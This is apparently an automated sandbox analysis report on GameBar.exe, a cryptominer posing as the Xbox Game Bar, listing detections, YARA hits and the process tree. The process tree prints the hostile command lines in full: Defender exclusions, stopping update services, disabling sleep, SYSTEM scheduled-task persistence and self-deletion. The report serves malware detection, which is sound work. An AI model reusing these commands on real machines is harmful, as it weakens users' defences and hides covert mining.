Edit tour

Windows Analysis Report
GameBar.exe

Overview

General Information

Sample Name:	GameBar.exe
Analysis ID:	873248
MD5:	8efb0a8fd404d31541b7592cae776e58
SHA1:	1be6c32c0a13a1f76b9eeed08b46192ceb197d29
SHA256:	6bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0
Tags:	exe
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Malicious sample detected (through community Yara rule)

Sigma detected: Stop multiple services

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Hides threads from debuggers

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Writes to foreign memory regions

Found strings related to Crypto-Mining

Self deletion via cmd or bat file

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sample is not signed and drops a device driver

Creates files in the system32 config directory

Found hidden mapped module (file has been removed from disk)

Modifies the context of a thread in another process (thread injection)

Adds a directory exclusion to Windows Defender

PE file contains section with special chars

Uses powercfg.exe to modify the power settings

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Entry point lies outside standard sections

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Creates driver files

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

PE / OLE file has an invalid certificate

PE file contains more sections than normal

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

GameBar.exe (PID: 7164 cmdline: C:\Users\user\Desktop\GameBar.exe MD5: 8EFB0A8FD404D31541B7592CAE776E58)

powershell.exe (PID: 6080 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7208 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 7244 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 7260 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 7276 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 7292 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 7308 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)

cmd.exe (PID: 7328 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 7380 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 7460 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 7496 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 7512 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powershell.exe (PID: 7344 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7912 cmdline: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\GameBar.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

choice.exe (PID: 7984 cmdline: choice /C Y /N /D Y /T 3 MD5: EA29BC6BCB1EFCE9C9946C3602F3E754)

GameBar.exe (PID: 7948 cmdline: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe MD5: 8EFB0A8FD404D31541B7592CAE776E58)

conhost.exe (PID: 3680 cmdline: C:\Windows\System32\conhost.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dwm.exe (PID: 7664 cmdline: C:\Windows\System32\dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)

powershell.exe (PID: 8020 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 8168 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 7152 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5208 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 6092 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5792 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 6036 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)

cmd.exe (PID: 5196 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 416 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 968 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 7108 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 5624 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powershell.exe (PID: 484 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 7580 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 2496 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmcqiiob#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

GameBar.exe (PID: 7908 cmdline: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe MD5: 8EFB0A8FD404D31541B7592CAE776E58)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\drwozmpbokky.tmp	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x4d1250:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x4c8e86:$s2: --cpu-affinity 0x4c8ea0:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x4c86a8:$s4: password for mining server
C:\Windows\Temp\drwozmpbokky.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\drwozmpbokky.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\drwozmpbokky.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
C:\Windows\Temp\drwozmpbokky.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION

Memory Dumps

Source	Rule	Description	Author	Strings
00000031.00000002.672175121.0000017AF520B000.00000004.00000020.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x65db:$s06: --algo=rx/0
00000031.00000002.672316897.0000017AF5240000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000031.00000002.672316897.0000017AF524F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0788:$a1: mining.set_target 0x4ebf68:$a2: XMRIG_HOSTNAME 0x4eda60:$a3: Usage: xmrig [OPTIONS] 0x4ebf40:$a4: XMRIG_VERSION
Process Memory Space: GameBar.exe PID: 7948	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth (Nextron Systems)	0x775bc:$sa1: stratum+tcp:// 0x77606:$sa1: stratum+tcp://
Process Memory Space: GameBar.exe PID: 7948	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0xa3d25:$s01: --cpu-priority= 0xa366e:$s05: --nicehash
Process Memory Space: GameBar.exe PID: 7948	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: GameBar.exe PID: 7948	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xa5ca9:$a1: mining.set_target 0xa286b:$a2: XMRIG_HOSTNAME 0xa3420:$a3: Usage: xmrig [OPTIONS] 0xa284c:$a4: XMRIG_VERSION
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x4d1250:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x4c8e86:$s2: --cpu-affinity 0x4c8ea0:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x4c86a8:$s4: password for mining server
24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x4d4b30:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x4cc766:$s2: --cpu-affinity 0x4cc780:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x4cbf88:$s4: password for mining server
24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
24.2.GameBar.exe.7ff6d93f1520.1.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x4d0250:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x4c7e86:$s2: --cpu-affinity 0x4c7ea0:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x4c76a8:$s4: password for mining server
24.2.GameBar.exe.7ff6d93f1520.1.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x4d0241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
24.2.GameBar.exe.7ff6d93f1520.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
24.2.GameBar.exe.7ff6d93f1520.1.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d07a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d0fc8:$s3: \\.\WinRing0_ 0x4c94c8:$s4: pool_wallet 0x4c52d0:$s5: cryptonight 0x4c52e0:$s5: cryptonight 0x4c52f0:$s5: cryptonight 0x4c5300:$s5: cryptonight 0x4c5318:$s5: cryptonight 0x4c5328:$s5: cryptonight 0x4c5338:$s5: cryptonight 0x4c5350:$s5: cryptonight 0x4c5360:$s5: cryptonight 0x4c5378:$s5: cryptonight 0x4c5390:$s5: cryptonight 0x4c53a0:$s5: cryptonight 0x4c53b0:$s5: cryptonight 0x4c53c0:$s5: cryptonight 0x4c53d8:$s5: cryptonight 0x4c53f0:$s5: cryptonight 0x4c5400:$s5: cryptonight 0x4c5410:$s5: cryptonight
24.2.GameBar.exe.7ff6d93f1520.1.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ca268:$a1: mining.set_target 0x4c5a48:$a2: XMRIG_HOSTNAME 0x4c7540:$a3: Usage: xmrig [OPTIONS] 0x4c5a20:$a4: XMRIG_VERSION
Click to see the 10 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3452, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7208, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: GameBar.exe	ReversingLabs: Detection: 51%
Source: GameBar.exe	Virustotal: Detection: 35%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: GameBar.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

Avira: detection malicious, Label: TR/AD.Nekark.btvkb

Multi AV Scanner detection for dropped file

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	ReversingLabs: Detection: 51%
Source: C:\Windows\Temp\drwozmpbokky.tmp	ReversingLabs: Detection: 44%

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.672316897.0000017AF5240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.672316897.0000017AF524F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GameBar.exe PID: 7948, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED

Found strings related to Crypto-Mining

Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: losestratum+tcp://
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: cryptonight/0
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: losestratum+tcp://
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Source: C:\Users\user\Desktop\GameBar.exe	Directory created: C:\Program Files\WindowsApsss	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Directory created: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Directory created: C:\Program Files\Google\Libs	Jump to behavior

Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: GameBar.exe, 00000000.00000002.468386043.00007FF672919000.00000040.00000001.01000000.00000003.sdmp, GameBar.exe, 00000018.00000002.577177484.00007FF6D9AD9000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: GameBar.exe, GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: GameBar.exe, 00000000.00000002.468386043.00007FF672919000.00000040.00000001.01000000.00000003.sdmp, GameBar.exe, 00000018.00000002.577177484.00007FF6D9AD9000.00000040.00000001.01000000.00000007.sdmp

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443

Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 0000000D.00000003.429000114.0000016DFE3F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.408934816.0000016DFE3AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.459063573.0000016DFE66B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsof
Source: powershell.exe, 0000000D.00000003.408934816.0000016DFE43F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.429000114.0000016DFE452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.osofts/Microt0
Source: powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE5F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
